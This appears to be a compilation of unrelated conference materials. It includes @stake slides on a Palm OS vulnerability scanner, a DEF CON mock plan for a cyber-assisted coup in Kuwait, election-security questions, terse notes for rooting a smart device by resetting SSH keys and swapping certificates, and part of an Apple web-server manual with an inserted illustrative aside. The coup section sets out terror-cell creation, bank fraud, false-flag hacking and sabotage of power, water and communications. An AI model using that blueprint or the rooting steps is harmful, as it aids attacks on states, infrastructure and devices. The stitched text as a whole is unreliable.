[Layer diagram: Palm Hardware → Palm OS → PocketC → Pocket Toolbox and AUSTIN NetLib → AUSTIN and its includes (Scan.h, GUI.h, Net.h, Prefs.h)]
Tools Used To Develop AUSTIN
POSE - Palm OS Emulator
http://www.palmos.com/dev/tools/emulator/
PDE - PocketC Desktop Environment
http://www.orbworks.com/pcpalm/index.html
PRC-Tools - Includes gcc and other tools used to
create Palm executables
http://prc-tools.sourceforge.net/
Palm SDK
http://www.palmos.com/dev/tools/sdk/
PilRC
http://www.ardiri.com/index.php?redir=palm&cat=pilrc
Lesson Learned:
When adding PRCs
to POSE always do
so when the Palm is
displaying
Applications.
Palm OS NetLib
Provides network services to Palm OS applications
– Stream-based communications using TCP
– Datagram-based communications using UDP
– Raw IP available too
In addition to native Palm OS function calls, NetLib also
supports the Berkeley Socket API
Lesson Learned:
Using the native NetLib
calls gives you much better
control over network
communications, such as
the ability to set timeouts.
Lesson Learned:
Close sockets as
soon as you no
longer need them,
you only have half a
dozen to play with!
Native Network Library
AUSTIN Net Lib implemented in C as a PocketC native
library
Implements the following calls
– netLibInit(…)
– netLibVersion(…)
– netSetTimeout(…)
– netGetError(…)
– netLibClose(…)
– netTCPConnect(…)
– netSocketConnect(…)
– netSocketOpen(…)
– netSocketReceive(…)
– netSocketSend(…)
– netSocketClose(…)
Lesson Learned:
Default timeout is 5 seconds, you may need
to increase this if you’re on a slow
connection, see the Preferences database.
Example: netSocketSend()
// sends data via socket
// int netSocketSend(int socket, string data, int length, int flags, pointer error)
// returns number of bytes sent
void netSocketSend(PocketCLibGlobalsPtr gP) {
Value vSocket, vString, vLength, vFlags, vErrorPtr, *errP;
char *buf;
Int16 bytes;
// get parameters
gP->pop(vErrorPtr);
gP->pop(vFlags);
gP->pop(vLength);
gP->pop(vString);
gP->pop(vSocket);
Example: netSocketSend() (continued)
// dereference the error ptr
errP = gP->deref(vErrorPtr.iVal);
// lock string before modification
buf = (char *) MemHandleLock(vString.sVal);
// send data, capture number of bytes sent
bytes = NetLibSend(AppNetRefnum, vSocket.iVal, buf, vLength.iVal,
vFlags.iVal, 0, 0, gP->timeout, &(gP->error));
// cleanup
MemHandleUnlock(vString.sVal);
gP->cleanup(vString);
// return number of bytes sent, set error ptr
gP->retVal->iVal = bytes;
errP->iVal = gP->error;
}
HTTP HEAD with AUSTIN Net Lib & Net.h
//http_head.pc
library "AUSTIN_NetLib"
#include "Net.h"
main() {
int err, port, socket, bytes;
string result, host, toSend = "HEAD / HTTP/1.0\r\n\r\n";
err = initNet();
host = getsd("Connect to?", "192.168.199.129");
port = getsd("Port?", "80");
socket = tcpConnect(host, port);
if (socket >= 0) {
bytes = tcpWrite(socket, toSend);
bytes = tcpRead(socket, &result, 200);
puts("Received " + result);
tcpClose(socket);
}
clearNet();
}
More Lessons Learned about Native Libraries
Read all the PocketC documentation on native libs
(i.e. that one file in the docs/ folder :-)
Make sure you have your dev environment set up
correctly, i.e. all the include files and all the lib files
Go to the PocketC forums and read the discussions
that have mentioned native libs (some have code
samples)
Use AUSTIN Net Lib as a basis for your own libs (and
re-use the makefile too!)
Database Access
Pocket Toolbox manipulates two DB formats
– Pilot-DB (GPL)
– HanDBase (Commercial)
Databases are used throughout AUSTIN
– Preferences
– Web vulnerabilities
– Results
Graphical User Interfaces
Two ways to create GUIs on Palm OS
–
Dynamically (i.e. programmatically)
–
Resource files (i.e. using PilRC to create a resource file)
Part of AUSTIN’s resource file
FORM ID 4000 AT (0 0 160 160)
NOFRAME
MENUID 8000
BEGIN
TITLE "AUSTIN"
BUTTON "Scan!" ID 4201 AT (121 2 AUTO 9) FONT 1
LABEL "Options:" AUTOID AT (0 78) FONT 0
CHECKBOX "TCP Scan" ID 4301 AT (48 62 AUTO AUTO) FONT 0
Scheduled Scanning
AUSTIN can scan at regular intervals
Users can specify
– Number of scans
– Minutes between scans
– Whether to scan or sleep first
Tying it all Together
[Build-flow diagram: Source, RCP resources, Icons, and a Creator ID (from palmos.com) are processed by PilRC, the PDE, and PAR to produce AUSTIN]
Note: AUSTIN Net Lib could also be embedded
inside AUSTIN but is kept separate to facilitate reuse
But wait! There’s more!!!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
@stake SonyEricsson P800 Development
What is the P800?
@stake NetScan
@stake MobilePenTester
@stake PDAZap
Where can we get them?
Advert for CCC / Thanks
What is the P800?
Cell-phone
–
GSM
–
GPRS
–
HSCD
–
Tri-band
PDA
–
Symbian OS Based
–
12mb Internal Flash
–
Memory Stick Duo ™ Support
Other
–
Bluetooth Support
–
Camera
@stake NetScan
What is it?
–
TCP/UDP port scanner
Why did you develop it?
–
Cutting our teeth on Symbian
development
Features?
–
TCP/UDP
–
Ports 1 to 65535
–
Timeout configuration
–
Basic error checking
@stake MobilePenTester
What is it?
–
The first generation
of cellular Swiss army
knives
Why did you develop it?
–
To allow us to enhance our cellular
network assessments and also
empower our operator clients
to DIT (Do It Themselves)
Features?
–
NetScan
–
PDACat
–
WAPScan port
–
HTTP vulnerability scanner
Ollie’s Hand
(oh and the main
menu)
PDACat
in action
@stake PDAZap
What is it?
–
The first generation
forensics tool for P800
Why did you develop it?
–
Help us research the device,
help people involved in IR
(incident response)
Features?
–
Mirror the device's flash
to Memory Stick Duo ™
–
Mini file browser
Where can we get them?
@stake dot com
–
NetScan / MobilePenTester:
http://www.atstake.com/research/tools/vulnerability_scanning/
–
PDAZap
http://www.atstake.com/research/tools/forensic/
Who developed them?
–
Ollie Whitehouse (ollie at atstake.com)
Anything else cool?
–
RedFang (The Bluetooth Hunter)
http://www.atstake.com/research/tools/info_gathering/
P800
Ollie
Advert for CCC / Thanks
So?
–
Ollie is speaking at CCC between 7th and 10th
of August 2003
On what?
–
Cellular Network Security: The New Frontier
GSM/GPRS/UMTS Introduction
GSM/GPRS/UMTS Security
Pragmatic GSM/GPRS/UMTS Assessments
Other areas of assessment/research
Other info?
–
Chaos Communication Camp 2003,
The International Hacker Open Air Gathering
7/8/9/10th August 2003
near Berlin, Germany (Old Europe),
http://www.ccc.de/camp/
Ollie’s current cutting
edge development
platform!
Thanks for listening, sorry I can’t be here!
The Future
Trivia Question:
Who makes this
Palm OS watch?
NASL Scanning
Idea
– How to leverage the work that the Nessus team has done?
Issues
– (Nearly) All tests written in NASL
– Nessus/NASL not made to run on a Palm
– Complexity is higher
Comparing NASL and PocketC
Similarities
–
Basic C syntax
for and while loops
Control flow
Blocks
–
No memory management
–
Ints, chars, strings, and arrays
should cover most (all?) NASL
var types
Differences in NASL
–
Comments (# vs. //)
–
No need to declare variables
–
Named function parameters
–
Varargs
–
The “x” operator
–
The “><“ operator
–
Specific functions
More Ideas for Features
Creation of custom IP packets
– Enable SYN, FIN, XMAS scans
– Useful for NASL functions too
Network tools (e.g. IP<->Hostname lookups, ping,
traceroute, etc.)
SSL scanning (probably wait for Palm OS 5 device)
VulnXML support for URL scanning
Download updates to URL vuln database
Other suggestions?
Let’s Review Those Goals
Overview of Palm OS as a hacking platform
Walkthrough of a Palm OS-based vulnerability scanner
–
Architecture
–
Features & how they’re implemented
–
Lessons learned
Release a new tool for Palm OS
Have Fun!
Thanks
for listening!
Any questions?
You can download AUSTIN here:
http://atstake.com/research/tools/vulnerability_scanning/ | pdf |
A COUP D'ETAT BY A GROUP OF MERCENARY HACKERS
Paper by: C Rock and S Mann:
Winston Churchill famously said - when the Germans were about to
overrun France on one or other of their invasions - "Gentlemen, do
not forget, this is not just about France ... this is about
champagne."
A 'Coup' in France can mean a glass of champagne. A blow. But that
is not our subject. We mean Coup d'Etat, putsch, Assisted Regime
Change.
The Urban Dictionary: "Coup d'Etat
Seizure of power by an armed entity, usually the army but
sometimes the police.
Usually coups are perpetrated in countries with very weak
governments, such as in West Africa, Bolivia, or Southwest Asia.
They get progressively worse (i.e., more violent, more prolonged,
and more repressive) until eventually some junta builds up
protection against the next coup. This is what happened in Iraq
after 1979; it happened in Syria in 1973; it also happened in
Japan in 1607. In other cases, the coup accomplishes its goals
(Chile 1973) and retires as a PR move.
Military coups are difficult to pull off and usually are nipped in
the bud. Even with foreign assistance, they are hard, because they
are a form of high-speed civil war.
by Primus Intra Pares July 11, 2010"
So how does this paper define its subject matter, the Coup d'Etat?
A blow - a knock out blow - against the existing government of a
sovereign state. A blow that puts in place a new government. That
blow is the work of a group within the existing state government.
They are armed & powerful. This bunch, however, are modern. They
are going to use hackers.
Putsch? Another word for the same thing. Assisted Regime Change?
Perhaps the same thing, but probably very different. Assisted
Regime Change can be a euphemism for a Coup or Putsch, or it can
be far more insidious.
When a democracy votes it may result in a regime change. It's
meant to. What if a super power carries out actions to influence
an election that does bring down a regime? What if those actions
were not overt? What if those actions were covert or clandestine?
What if the good of the people is best served if there is the need
for a regime change? What if those actions - albeit covert - were
really in the interests of the people? Who says that's so?
One man's Coup leader - a hero - is another's Superpower puppet.
Traitor.
New definition of COUP after working with the Cyber angle
What if the Coup of this century does NOT follow our definition
exactly … that was:
A Coup d'Etat: a secretly prepared but overtly carried out illegal
blow to unseat & replace the ruling executive government of a
sovereign state, somehow executed by the military or other elite
of that state's apparatus or their agents.
What if (because change is the one constant etc) we say:
A Coup d'Etat: a secretly prepared but overtly carried out illegal
blow to somehow takeover the ruling executive government of a
sovereign state, somehow executed by the military or other elite
of that state's apparatus or their agents.
It doesn’t have to be replaced. It has to be suborned. I guess
that the best example of a suborned government is that of Petain,
and Vichy France.
Working Scenario Back Story and Mudmap
1. Historically (19TH C onwards … the Great Game …) Russia has
always wished to extend its power down into the sub-continent and
- therefore - the Gulf.
2. That was the cause of their long alliance with Iran … All the
more so today … Putin / Turkey / Syria.
3. Russia are now allies of Iran in the Syria Civil War … despite
Iran now being an ally of the USA, and despite the long standing claims
of Iraq that Kuwait has drilled into its reserves using
horizontal drilling.
4. Russia would love Basra, the port that the British
always knew was the key card to the Gulf. But Russia can't have
Basra, so they hatch a plan - along with their friends in Tehran -
to take Kuwait, the next best thing to Basra.
5. BUT: Not to take Kuwait in the old fashioned sense … NO
invasion … NO traditional Coup … instead they decide to take
Kuwait by means of a creeping Coup that replaces the machinery of
state - what an FSB / KGB Officer would call the apparat - with a
cadre of infiltrated apparatchiks … a group who surround the
throne so closely that in effect they tell the throne Do this …
Don’t do that …
6. How to achieve this? The Russians know two things above all
else: the people of Kuwait are still grateful to the US and allies
for winning their country back from Saddam, and the deep and
ancient friendship between the Royals of Saudi Arabia and Kuwait …
through their common tribe as well as everything else.
7. They also know that there is a friendship between the tribe of
Kuwait and people of SW Iran. This is documented and crosses or
transcends the Sunni / Shia rivalry.
8. Meanwhile … What do the Saudi’s want more than anything else?
To know the intent of the enemy commander. In this case that of
the Ayatollah of Iran and those around him. This is the great
Middle East war of our time: the Sunni Gulf versus the ancient
might of Persia …
9. So the Russians set up a fake agent … close to the Ayatollah’s
etc … so that this agent becomes an asset of the Kuwait
intelligence service … and the Saudi intelligence service love the
Kuwaiti’s for this … it is all their dreams come true …
10. While all this is going on IS have built up a serious chain of
terrorist cells within Kuwait. Kuwait is 30% Shia. The IS cells
are against them, even though they are also against the normal
Sunnis as well … and to what extent are IS in fact Saudi backed?
Big Q??
11. Suddenly a number of things happen. IS jump up in Kuwait fully
active … and do so apparently fully backed by the Saudi’s.
12. At the same time the Kuwaiti run agent close to the
Ayatollah’s turns out to be a plant … deliberately set up by
Kuwait to mislead Riyadh … What?
13. At the same time Iraq (with Baghdad controlled by Tehran, of
course) presses its claims: horizontal drilling! We want our oil
back … or $B …
14. Kuwait are now under attack. From Iraq about the oil. From IS
about Allah. From the Saudi’s for fooling them so badly. AND SO …
in this massive fall out Kuwait turn to their new found and ever
willing strong friend: Russia … and Russia moves in …
It is hacking and manipulation of IT data that is making ALL this
happen … How? Because so much of all this is in fact now IT based:
information storage, intelligence analysis and management, social
media, The News. You (us) already own the country's entire IT
systems; now it's just a matter of pulling the right levers.
Corruption is perfect to bring down the government. Wasting the
country's natural resources and all of that.
MOCK PAPER WRITTEN BY THE RUSSIAN STAFF
[in fact written by Chris Rock and Simon Mann]
1. Introductory Background
In order to avoid being encircled by foreign powers and possible
enemies Russia has long sought to establish herself as a Major
Power in the Arabian Gulf and the Indian Ocean.
This intent has all the more force when one considers the economic
importance of the Gulf to our rivals, the USA and allies, as well
as the strategic importance of the Indian Ocean.
Iran has long been our ally and friend, most especially since the
Coup of 1941 engineered by ourselves and the British, against the
then interest of Nazi Germany.
The Anglo-Soviet Invasion of Iran also known as Anglo-Soviet
Invasion of Persia was the invasion of the Empire of Iran during
World War II by Soviet, British and other Commonwealth armed
forces. The invasion lasted from 25 August to 17 September 1941,
and was codenamed Operation Countenance. The purpose was to secure
Iranian oil fields and ensure Allied supply lines (see Persian
Corridor) for the Soviets, fighting against Axis forces on the
Eastern Front. Though Iran was officially neutral, according to
the Allies its monarch Rezā Shāh was friendly toward the Axis
powers and was deposed during the subsequent occupation and
replaced with his young son Mohammad Reza Pahlavi.
Our efforts in Afghanistan, mounted from our then controlled
state, Turkmenistan, were all a part of this longstanding Russian
Grand Strategic desire. The British and then the USA have always
fought against this aim of ours, a fight which validates our
intent. They are afraid of a Russia that can exercise her power in
the Arabian Gulf / Sub-continent of India / Indian Ocean theatre.
Following the invasion of Iraq by the US and its allies in 2003 -
and the subsequent events in the region - it has become all the
more imperative that Russia takes the steps needed to defend
herself.
The ideal for Russia would be the control of Basra as a military
and commercial port. Basra - as the British always knew - is vital
to the control of the Arabian Gulf. That is why the British always
tried to hold on to Basra. Since Basra is impossible without
risking all out war with the USA, the control of Kuwait and of the
Straits of Hormuz will be enough.
The latter is already achieved by our allies Iran.
Therefore, this paper outlines a plan whereby Russia can take
control of Kuwait, thus achieving a major step towards her Grand
Strategy for the Middle East and Indian Ocean theatres of
operations.
2. The Aim
Russia’s Aim is to capture and hold full control of the mechanisms
of power of Kuwait.
3. Plan: General Outline
The plan is that over as many years as it takes Russia will
befriend the rulers of Kuwait. This friendship will become
stronger as other friends of Kuwait fall away. In the end Russia
achieves her aim. Russia will be the only friend, and the only
actual military ally when all else have failed.
Russia will then control Kuwait. The Russian aim will have been
achieved.
Since these rulers of Kuwait are traditional friends and allies of
both the ruling family of Saudi Arabia, that of Abdul Aziz Ibn
Saud and of the USA and allies - especially the UK of which Kuwait
was a Protectorate until 1961 - this will be hard. All Kuwait
still hold dear the memory of the USA and allies rescuing their
country from the invasion by Iraq of August 1990.
However, we should also keep in mind that before the Iraq invasion
Kuwait was the most pro USSR country in the Gulf region, and was
the portal for all Gulf states to stay in good contact with
Russia. There is a historic background to our plan.
Therefore Russia must be clever. We befriend Kuwait gently. Over
time Russia takes her time. We support Kuwait whenever we can.
At the same time we set into action maskirovka operations that
will alienate Kuwait from her friends. These operations terminate
with a crisis, at which point Russia steps in to rescue her
friend, and new and close ally. D DAY.
All of these operations must be clandestine in the true sense. They are covert. They
will always be denied. 'Plausible deniability' is essential in every action at every
stage. As much as possible these operations will be carried out using IT hacking
and deception. By that means deniability is more easily achieved.
While as much activity as possible is cyber there will be a
cocktail of hacking, cyber, misinformation and hard acts of
violence. Such a cocktail will give the most effective result.
Highlighting in this colour denotes those points in the attack to be
carried out by hacker / cyber-war ops.
4. DAESH
An IS splinter group will be brought into being by us. Twenty to
one hundred men will be a good strength. They will be part Kuwaiti
and part Iraqi. On behalf of the Caliphate they claim money from
Kuwait for oil stolen by Kuwait’s slant drilling across the Iraq
border at the Rumaila field.
This group also represents the dissenting interest of the
stateless Bidoon people (150,000 or so … 10% of the Kuwaiti
population).
Russia will clandestinely set up, train, equip and sustain this
splinter group. It will in fact exist, albeit very small.
The group will wage cyber war against Kuwait, although this will
always be kept in check. We do not want to show our hand too
early.
Some terrorist actions of this group will be real. They will be up
to IS’s high standards of nastiness. The operations of this group
build slowly, leading in to the crisis ... thence to D DAY.
This splinter group will be penetrated by Kuwait intelligence.
This penetration will be achieved by a number of means: spies and technical intercept.
However, this penetration will be fake, a maskirovka, set up by
us, Russia, and by the splinter group itself.
The fake intelligence that will come out of the IS splinter group
will slowly build a false picture that the group is strongly
backed by Saudi Arabia. That Saudi Arabia are in fact attacking
Kuwait.
5. MISRULE: Misfortune, incompetence, corruption and mis-rule
Misfortune, incompetence, corruption and mis-rule will be engineered. In the process
Kuwait are robbed and defrauded of Billions of US $ worth of money
and oil. This is achieved by offshore - and deliberately incriminating - $ transfers
from private and commercial banks.
These actions will be undertaken by our own cyber / hacking teams,
but they will be made to look like the work of the Saudi backed IS
splinter group described above.
The actions of this sub-operation will build slowly, leading into
the crisis and then D DAY.
6. POISONED INTELLIGENCE
We, Russia, will feed into the Kuwait Intelligence Service an
intelligence circuit that penetrates Iran’s Intelligence service
and military. This will be high level and of great value. Kuwait
will feed it to the Saudi’s.
At the right time - as the crisis and D DAY come closer - the
Saudis discover that this intelligence circuit is a dangerous
fake, and that the Kuwaitis must have known that.
7. THIEVES: oil & oil revenue stolen from Saudi Arabia and Iraq
The theft of oil and oil revenue from Saudi Arabia and Iraq by any
possible means will be carried out in such a way that it must be
Kuwait doing the stealing.
This will primarily be a hacking operation. The blame will be laid
at the door of Kuwait.
8. FALSE CYBER: acts of cyber warfare against Saudi Arabia and
Iraq
These will be carried out by our Russian teams but they will be
clumsy, and leave the traces of their being the work of Kuwait.
9. SPIRAL
This is a downward spiral - leading into civil war and mutiny -
that coordinates with, but is not part of, the IS splinter group
activities.
- setting up of NGOs in Kuwait and overseas that demand human and
civil rights, etc., for Kuwait
- there is as a result civil disorder. This disorder builds. At all
times paid agitators raise the temperature of such actions
- false flag operations on social media and the internet as a whole
intensify emotions and manipulate the situation
- Kuwait Security Forces (KSF) overreact. This is ensured by
having paid agitators amongst the KSF
- overreaction sparks further action, and that brings about
terrible overreaction once more … the downward spiral
accelerates … civil insurrection is now rampant
- as background to this civil insurrection there are border and
terrorist incidents. There is insurgency and terrorism. There are
acts of sabotage, actual and virtual
- at some point there is a mutiny of KSF
- mutiny is suppressed by other parts of KSF and thus civil war has
begun. Of course, within both parts of the KSF in this fight
there are paid agitators. They are there to ensure we achieve
what we want
- the losing part of KSF in this civil war will be that part which
the world has been led to believe is the ‘good’ part
- their requests for assistance will lead to the welcome
assistance of Russia, when it comes
The above subordinate operations [DAESH - MISRULE - POISONED
INTELLIGENCE - THIEVES - FALSE CYBER] all contribute to SPIRAL.
They build slowly, then combine to create the D DAY brought about
at the end of SPIRAL.
10. D DAY
SPIRAL leads to and ends with D DAY. The other subordinate
operations have also slowly built to this point.
Just at the moment that the civil war between the two different
parts of KSF - the mutineers and the mutiny suppressors - has
become serious, and the world sees what is at stake, then the
crisis is there. It is D DAY.
- shut down all communications, internal and external, civil and
government.
- shut all phone exchanges, cell phone masts and switches,
international voice and data gateways
- shut all internet and ‘bomb out’ all computers
- shut down all radio, TV and press
- close airport, ATC and airspace
- close port and sea movements
- close banks (domestic & international), ATMs, credit
transactions, on line banking etc
- shut power generation so that there is no electricity or natural
gas supply
- sabotage high tension power lines and drain transformers of
cooling oil
- close down all petrol stations
- close public water supply
- close traffic management computers
11. DESIGNATE
This sub-operation is concerned with the selection and preparation
of a new Head of State and his supporting Ministers and staff.
Factors that must be taken into account here include the
following: there is a tribal connection to Iran that crosses the
Sunni-Shia divide. It should be possible to find such a person
who is or becomes a full Russian agent.
12. POST
This sub-operation is concerned with the ways in which our power
over Kuwait is to be exercised once the above operations have
taken place and Russia is in charge.
Sean Kanuck
DEF CON 25
Hacking Democracy :
A Socratic Dialogue
How do you know
if your vote was
recorded correctly
Which is more
important to you :
secrecy or verification
How much error
is too much for
legitimacy
Were you on the
right list
Were you in the
right place
Does the process
impact you
more than others
Who decides what
becomes news
Which runner is
in the lead
Is the playing field
made of natural
or artificial turf
How much
free speech
is too much
Can foreign guests
join the party
Is this an
invitation to a
masquerade ball
Which innocent
victims deserve
protection
Are they required
to accept help . . .
from their opponent
Is any of this
actually
new at all
Can two rights
make a wrong
KinectASploit
What if you took a
kinect,
used its skeleton
tracking features
KinectASploit
Sprinkled in some
hacking tools:
Wait a minute!... we did
that already.
Lets find out!
Come see the Demo at
Defcon20 and look for the tool
source at:
http://p0wnlabs.com/defcon20
jeff bryner
p0wnlabs.com
Use @ your own risk
0x01 bettercap
0x02 ssh
rm /etc/dropbear/*
dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
dropbear -r /etc/dropbear/dropbear_rsa_host_key
0x03 root
1. /usr/share/mico/messaging/messaging.conf
0x04 https
2. /usr/share/mico/messaging/mediaplayer.cfg CA
3. pub
openssl rsa -inform DER -in priburp -pubout -out burp.pub
4.
5. sopub
6.
0x05
Mac OS X Server
Web Technologies
Administration
For Version 10.3 or Later
Apple Computer, Inc.
© 2003 Apple Computer, Inc. All rights reserved.
The owner or authorized user of a valid copy of
Mac OS X Server software may reproduce this
publication for the purpose of learning to use such
software. No part of this publication may be reproduced
or transmitted for commercial purposes, such as selling
copies of this publication or for providing paid for
support services.
Every effort has been made to ensure that the
information in this manual is accurate. Apple Computer,
Inc., is not responsible for printing or clerical errors.
Use of the “keyboard” Apple logo (Option-Shift-K) for
commercial purposes without the prior written consent
of Apple may constitute trademark infringement and
unfair competition in violation of federal and state laws.
Apple, the Apple logo, Mac, Mac OS, Macintosh, and
Sherlock are trademarks of Apple Computer, Inc.,
registered in the U.S. and other countries.
Adobe and PostScript are trademarks of Adobe Systems
Incorporated.
Java and all Java-based trademarks and logos are
trademarks or registered trademarks of Sun
Microsystems, Inc. in the U.S. and other countries.
Netscape Navigator is a trademark of Netscape
Communications Corporation.
UNIX is a registered trademark in the United States and
other countries, licensed exclusively through
X/Open Company, Ltd.
034-2350/09-20-03
Contents

Chapter 1  Web Technologies Overview  7
  Key Web Components  8
  Apache Web Server  8
  WebDAV  8
  CGI Support  8
  SSL Support  8
  Dynamic Content With Server-Side Includes (SSI)  8
  Front-End Cache  9
  Before You Begin  9
  Configuring Your Web Server  9
  Providing Secure Transactions  9
  Setting Up Websites  9
  Hosting More Than One Website  10
  Understanding WebDAV  10
  Understanding Multipurpose Internet Mail Extension  11

Chapter 2  Managing Web Technologies  13
  Setting Up Your Web Server for the First Time  13
  Using Server Admin to Manage Your Web Server  15
  Starting or Stopping Web Service  15
  Modifying MIME Mappings and Content Handlers  16
  Managing Connections  17
  Setting Simultaneous Connections for the Web Server  17
  Setting Persistent Connections for the Web Server  18
  Setting a Connection Timeout Interval  18
  Setting Up Proxy Caching  19
  Blocking Websites From Your Web Server Cache  20
  Using Secure Sockets Layer (SSL)  20
  About SSL  20
  Using WebDAV  21
  Using Tomcat  21
  Viewing Web Service Status  22
  Web Service Overview  22
  Web Service Modules in Use  22
  Viewing Logs of Web Service Activity  22

Chapter 3  Managing Websites  23
  Using Server Admin to Manage Websites  23
  Setting Up the Documents Folder for a Website  23
  Enabling a Website on a Server  24
  Changing the Default Web Folder for a Site  25
  Setting the Default Page for a Website  25
  Changing the Access Port for a Website  26
  Improving Performance of Static Websites (Performance Cache)  26
  Understanding the Effect of Using a Web Service Performance Cache  26
  Enabling Access and Error Logs for a Website  27
  Setting Up Directory Listing for a Website  28
  Creating Indexes for Searching Website Content  29
  Connecting to Your Website  29
  Enabling WebDAV on Websites  30
  Setting Access for WebDAV-Enabled Sites  31
  WebDAV and Web Content File and Folder Permissions  32
  Enabling Integrated WebDAV Digest Authentication  32
  WebDAV and Web Performance Cache Conflict  32
  Enabling a Common Gateway Interface (CGI) Script  33
  Enabling Server Side Includes (SSI)  33
  Viewing Website Settings  34
  Setting Server Responses to MIME Types and Content Handlers  34
  Enabling SSL  35
  Setting Up the SSL Log for a Website  36
  Enabling PHP  36
  User Content on Websites  36
  Web Service Configuration  37
  Default Content  37
  Accessing Web Content  37

Chapter 4  WebMail  41
  WebMail Basics  41
  WebMail Users  41
  WebMail and Your Mail Server  42
  WebMail Protocols  42
  Enabling WebMail  42
  Configuring WebMail  43

Chapter 5  Secure Sockets Layer (SSL)  45
  Setting Up SSL  45
  Generating a Certificate Signing Request (CSR) for Your Server  45
  Obtaining a Website Certificate  46
  Installing the Certificate on Your Server  47
  Enabling SSL for the Site  47
  Web Server SSL Password Not Accepted When Manually Entered  48

Chapter 6  Working With Open-Source Applications  49
  Apache  49
  Location of Essential Apache Files  50
  Editing Apache Configuration Files  50
  Starting and Stopping Web Service Using the apachectl Script  51
  Enabling Apache Rendezvous Registration  51
  Experimenting With Apache 2  55
  JBoss  56
  Backing Up and Restoring JBoss Configurations  58
  Tomcat  58
  MySQL  59
  Installing MySQL  60

Chapter 7  Installing and Viewing Web Modules  61
  Apache Modules  61
  Macintosh-Specific Modules  61
  mod_macbinary_apple  61
  mod_sherlock_apple  62
  mod_auth_apple  62
  mod_hfs_apple  62
  mod_digest_apple  62
  mod_rendezvous_apple  62
  Open-Source Modules  62
  Tomcat  62
  PHP: Hypertext Preprocessor  63
  mod_perl  63

Chapter 8  Solving Problems  65
  Users Can’t Connect to a Website on Your Server  65
  A Web Module Is Not Working as Expected  66
  A CGI Will Not Run  66

Chapter 9  Where to Find More Information  67

Glossary  69

Index  73
1 Web Technologies Overview
Become familiar with web technologies and understand
the major components before setting up your services
and sites.
Web technologies in Mac OS X Server offer an integrated Internet server solution. Web
technologies—also called web service in this guide—are easy to set up and manage,
so you don’t need to be an experienced web administrator to set up multiple websites
and configure and monitor your web server.
Web technologies in Mac OS X Server are based on Apache, an open-source HTTP web
server. A web server responds to requests for HTML webpages stored on your site.
Open-source software allows anyone to view and modify the source code to make
changes and improvements. This has led to Apache’s widespread use, making it the
most popular web server on the Internet today.
Web administrators can use Server Admin to administer web technologies without
knowing anything about advanced settings or configuration files. Web administrators
proficient with Apache can choose to administer web technologies using Apache’s
advanced features.
In addition, web technologies in Mac OS X Server include a high-performance, front-
end cache that improves performance for websites that use static HTML pages. With
this cache, static data doesn’t need to be accessed by the server each time it is
requested.
Web service also includes support for Web-based Distributed Authoring and Versioning,
known as WebDAV. With WebDAV capability, your client users can check out webpages,
make changes, and then check the pages back in while the site is running. In addition,
the WebDAV command set is rich enough that client computers with Mac OS X
installed can use a WebDAV-enabled web server as if it were a file server.
Since web service in Mac OS X Server is based on Apache, you can add advanced
features with plug-in modules. Apache modules allow you to add support for Simple
Object Access Protocol (SOAP), Java, and CGI languages such as Python.
Key Web Components
Web technologies in Mac OS X Server consist of several key components, which
provide a flexible and scalable server environment.
Apache Web Server
Apache is an open-source HTTP web server that administrators can configure with the
Server Admin application.
Apache has a modular design, and the set of modules enabled by default is adequate
for most uses. Server Admin can control a few optional modules. Experienced Apache
users can add or remove modules and modify the server code. For information about
modules, see “Apache Modules” on page 61.
Apache version 1.3 is installed in Mac OS X Server. Apache version 2 is provided with
the server software for evaluation purposes; it is located in /opt/apache2/.
WebDAV
Web-based Distributed Authoring and Versioning (WebDAV) is particularly useful for
updating content on a website. Users who have WebDAV access to the server can open
files, make changes or additions, and save those revisions.
You can also use the realms capability of WebDAV to control access to all or part of a
website’s content.
CGI Support
The Common Gateway Interface (CGI) provides a means of interaction between the
server and clients. For example, CGI scripts allow users to place an order for a product
offered on a website or submit responses to information requests.
You can write CGI scripts in any of several scripting languages, including Perl and
Python. The folder /Library/WebServer/CGI-Executables is the default location for CGI
scripts.
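For illustration only (this example is not from the manual, and the file
name is hypothetical), a minimal Perl CGI script saved as
/Library/WebServer/CGI-Executables/hello.cgi and marked executable might
look like this:

#!/usr/bin/perl
# Emit the required HTTP header, then a short HTML body.
print "Content-type: text/html\r\n\r\n";
print "<html><body><h1>Hello from CGI</h1></body></html>\n";

With the default configuration, such a script is typically reached through
the /cgi-bin/ URL path (for example,
http://server.example.com/cgi-bin/hello.cgi).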
SSL Support
Web service includes support for Secure Sockets Layer (SSL), a protocol that encrypts
information being transferred between the client and server. SSL works in conjunction
with a digital certificate that provides a certified identity for the server by establishing a
secure, encrypted exchange of information.
Dynamic Content With Server-Side Includes (SSI)
Server-side includes provide a method for using the same content on multiple pages in
a site. They also can tell the server to run a script or insert specific data into a page. This
feature makes updating content much easier, because you only revise information in
one place and the SSI command displays that revised information on many pages.
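As a sketch (the include path and file name here are hypothetical), a page
served with SSI processing enabled might reuse a shared footer and stamp
its modification date like this:

<!--#include virtual="/includes/footer.html" -->
Last updated: <!--#echo var="LAST_MODIFIED" -->

Depending on configuration, pages containing such directives usually need
a suffix (such as .shtml) that tells Apache to parse them before serving.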
Front-End Cache
The web server includes a high-performance cache that increases performance for
websites that serve static pages. The static content stays in the cache once used, so the
server can quickly retrieve this content when it is requested again.
Before You Begin
This section provides information you need to know before you set up your web server
for the first time. You should read this section even if you are an experienced web
administrator, as some features and behaviors may be different from what you expect.
Configuring Your Web Server
You can use Server Admin to set up and configure most features of your web server. If
you are an experienced Apache administrator and need to work with features of the
Apache web server that aren’t included in Server Admin, you can modify the
appropriate configuration files. However, Apple does not provide technical support for
modifying Apache configuration files. If you choose to modify a file, be sure to make a
backup copy first. Then you can revert to the copy should you have problems.
For more information about Apache modules, see the Apache Software Foundation
website at http://www.apache.org.
Providing Secure Transactions
If you want to provide secure transactions on your server, you should set up Secure
Sockets Layer (SSL) protection. SSL lets you send encrypted, authenticated information
across the Internet. If you want to allow credit card transactions through your website,
for example, you can use SSL to protect the information that’s passed to and from
your site.
For instructions on how to set up secure transactions, see Chapter 5, “Secure Sockets
Layer (SSL),” on page 45.
Setting Up Websites
Before you can host a website, you must:
• Register your domain name with a domain name authority
• Create a folder for your website on the server
• Create a default page in the folder for users to see when they connect
• Verify that DNS is properly configured if you want clients to access your website
by name
When you are ready to publish, or enable, your site, you can do this using Server
Admin. The Sites pane in the Settings window lets you add a new site and select a
variety of settings for each site you host.
See Chapter 3, “Managing Websites,” on page 23 for more information.
Hosting More Than One Website
